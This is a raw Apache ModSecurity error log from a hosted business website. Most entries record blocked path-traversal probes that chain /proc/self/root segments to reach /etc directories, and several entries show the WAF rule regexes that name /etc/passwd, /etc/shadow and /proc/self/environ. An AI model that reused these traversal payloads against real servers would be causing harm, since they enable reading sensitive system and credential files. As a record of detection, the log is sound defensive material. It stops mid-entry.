[Thu Mar 19 15:59:19.574051 2026] [:error] [pid 20435:tid 140411590858496] [client 74.7.243.128:42376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxHhpJaM1-0uhhUQJM82wAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 15:59:21.750623 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:52036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxHiQkwaGbbGflqUZDvMwAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 15:59:21.860216 2026] [:error] [pid 19655:tid 140411666392832] [client 74.7.228.61:59178] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxHiU1ujooLWdUDGy75BQAAAEk"]
[Thu Mar 19 15:59:22.375230 2026] [:error] [pid 20435:tid 140411590858496] [client 74.7.243.128:52046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxHipJaM1-0uhhUQJM83gAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 15:59:24.096172 2026] [:error] [pid 17887:tid 140411699963648] [client 204.12.208.18:59589] [client 204.12.208.18] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/wp-content/qq8c7500/index.php"] [unique_id "abxHjAkwaGbbGflqUZDvNQAAAMU"], referer: https://bandeirantesbombas.com.br/wp-content/qq8c7500/index.php
[Thu Mar 19 15:59:24.479150 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:52062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxHjPqxLDW4GITHUkSNEwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 15:59:55.130602 2026] [proxy_fcgi:error] [pid 7235:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:00:14.531808 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:52072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxHvsdf6f5d65gmYZSfRAAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:00:23.073910 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45878] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:00:35.163690 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:57074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxH0xCii7xarUs8iHYOJAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:00:46.046035 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46612] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:00:52.450450 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:41498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxH5Mdf6f5d65gmYZSfSQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:01:05.771013 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:46664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxH8RCii7xarUs8iHYORAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:01:07.037868 2026] [proxy_fcgi:error] [pid 19655:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47238] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:01:17.206919 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.243.128:50860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxH_f-YZRR_7pZ7nDKvAQAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:01:26.163084 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:36042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIBhCii7xarUs8iHYOXAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:01:29.131083 2026] [proxy_fcgi:error] [pid 7235:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47992] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:01:35.820438 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:41866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxID_XLqtnMIWvjpaJCgAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:01:43.383870 2026] [:error] [pid 20435:tid 140411590858496] [client 74.7.243.128:46000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIF5JaM1-0uhhUQJM8-wAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:01:49.051936 2026] [core:alert] [pid 30077:tid 140411683178240] [client 57.141.18.64:52030] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 16:01:50.562546 2026] [:error] [pid 19655:tid 140411733534464] [client 74.7.243.128:40726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIHU1ujooLWdUDGy75LwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:01:53.124488 2026] [proxy_fcgi:error] [pid 7235:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48738] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:01:54.977456 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:40730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIIuoXxyEfFpUF8f8w4AAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:02.539644 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:40742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIKv-YZRR_7pZ7nDKvEwAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:05.887361 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:47754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxILcdf6f5d65gmYZSfXQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:09.107214 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:47766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIMeoXxyEfFpUF8f8w5AAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:12.004552 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:59536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxINMdf6f5d65gmYZSfXgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:14.081966 2026] [proxy_fcgi:error] [pid 21219:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49408] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:02:14.806559 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:59548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxINuoXxyEfFpUF8f8w5gAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:16.852046 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:59556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxIOPXLqtnMIWvjpaJCkgAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:02:18.683649 2026] [:error] [pid 20435:tid 140411590858496] [client 74.7.243.128:59572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 